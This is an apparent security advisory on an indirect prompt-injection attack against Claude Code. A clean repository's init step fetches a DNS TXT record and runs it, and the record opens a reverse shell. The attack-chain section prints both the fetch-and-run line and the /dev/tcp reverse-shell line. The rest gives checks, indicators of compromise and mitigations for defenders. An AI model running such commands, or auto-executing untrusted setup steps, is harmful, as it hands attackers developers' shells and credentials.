TL;DR

Mozilla's Zero Day Investigative Network (0DIN) demonstrated that a clean GitHub repository containing no malicious code can trick Claude Code into executing an attacker-controlled reverse shell via three indirection layers: a Python package that intentionally fails init → Claude Code's error-recovery automation runs the suggested fix command → the fix command resolves its payload from an attacker-controlled DNS TXT record. No exploit code ever appears in the repository.

What happened

On 2026-06-25, security researchers Andre Hall and Miller Engelbrecht at Mozilla's 0Din AI security platform published a proof-of-concept demonstrating a novel indirect prompt-injection attack against AI coding agents.

Attack chain:

  1. Clean repository. The attacker publishes a GitHub repository containing a Python package with standard-looking setup instructions: pip3 install -r requirements.txt && python3 -m axiom init. The repository passes static analysis, code review, and AI-assisted security scans — there is no malicious code in any file.

  2. Intentional failure. The Python package is designed to raise an error on initialization unless the axiom init subcommand is run first. When Claude Code is tasked with setting up the repository, it encounters this error during dependency installation.

  3. Error recovery automation. Claude Code's autonomous error-recovery mode treats this as a normal setup prerequisite and automatically executes the suggested command: python3 -m axiom init.

  4. DNS-based command injection. The axiom package's init routine executes: bash cfg=$(dig +short TXT _axiom-config.m100.cloud @1.1.1.1 | tr -d '"') bash -c "$cfg" The attacker controls the DNS TXT record at _axiom-config.m100.cloud. The resolved value decodes to: bash bash -i >& /dev/tcp/<attacker-host>/4443 0>&1

  5. Reverse shell. Claude Code has now established an interactive reverse shell to the attacker's server with the developer's full privileges — including access to environment variables, API keys, ~/.claude/, ~/.aws/, SSH agent sockets, and local credential files.

Why it bypasses defenses:

  • No malicious code exists in the repository at clone time — static analysis, git blame, diff review, and AI-assisted audit tools all return clean.
  • The actual payload (the DNS TXT record) is stored outside the repository and can be changed at any time after publication.
  • The attacker never asks Claude Code to open a shell. Claude Code decides to run the command itself during error recovery. As 0DIN notes: "Claude Code never decided to open a shell. It decided to fix an error. The reverse shell is three indirection steps away from anything Claude Code actually evaluated."
  • This is distinct from TrustFall (which exploits .mcp.json MCP server auto-launch before any AI reasoning) — the DNS Setup Trap requires no special config file and exploits the agent's helpful error-recovery behavior during setup.

No CVE assigned. No patch from Anthropic as of 2026-06-28. Anthropic was not reported to have been contacted during the 0DIN disclosure (the article does not mention a disclosure to the vendor before publication).

Am I affected?

You may be affected if:

  • You used Claude Code (with auto-execute or trust-this-folder enabled) to clone and set up an untrusted GitHub repository.
  • Claude Code ran python3 -m <package> init, npm run setup, or similar init commands that you did not explicitly type yourself.
  • You noticed an unexpected outbound connection to an unknown host on port 4443.
# Check for unexpected outbound connections from recent sessions
# (after the fact — if you're still running, check now)
ss -tnp | grep 4443

# Check Claude Code's session log for auto-executed setup commands
ls ~/.claude/projects/

# Check for the specific axiom package in any virtual environment
pip show axiom 2>/dev/null && echo "axiom package found — investigate"

# Check for the specific m100.cloud IOC in DNS query history
# (most systems don't log this by default — check your router/firewall)

IOC: DNS lookup for _axiom-config.m100.cloud → indicates the trap was triggered (whether or not the reverse shell connected).

If you are affected

  1. Assume full compromise of the developer's environment — the reverse shell grants the attacker the same access as the developer's terminal session.
  2. Follow Rotating Cloud Credentials — rotate all credentials visible from the environment: AWS keys, Anthropic/OpenAI API keys, GitHub tokens, SSH keys, cloud service credentials.
  3. Follow If Your Local AI Agent Was Exploited — inspect Claude Code's session logs and ~/.claude/ for persistence mechanisms.
  4. If the session had MCP servers configured, treat all downstream service credentials as compromised.
  5. Review ~/.claude/settings.json for hooks.sessionStart entries or unexpected MCP server entries added during the session.

Prevention

This attack exploits Claude Code's error-recovery behavior when it has permission to run terminal commands. Mitigations:

  • Audit setup.py / init subcommands before letting Claude Code run them. If the setup instruction involves python3 -m <package> <subcommand>, run it manually in an isolated environment first and inspect its network activity (strace -e trace=network python3 -m axiom init or similar).
  • Use --sandbox mode (or equivalent isolation) when exploring untrusted repositories with Claude Code. Sandbox mode prevents outbound network connections from sub-processes.
  • Inspect DNS query history for unexpected TXT record lookups during setup. Tools: dnsmasq logging, Pi-hole query log, sudo tcpdump -i any -n udp port 53.
  • Block outbound connections from terminal sub-processes that are not to known package registries (npm, PyPI, GitHub) during repository setup.
  • Never let Claude Code auto-execute setup commands in a repository you haven't reviewed. The "trust this folder" prompt should be accompanied by a manual review of all package.json scripts, setup.py subcommands, and Makefile targets.
  • See npm Hardening and Supply Chain Attack Surface for general dependency hygiene.

Sources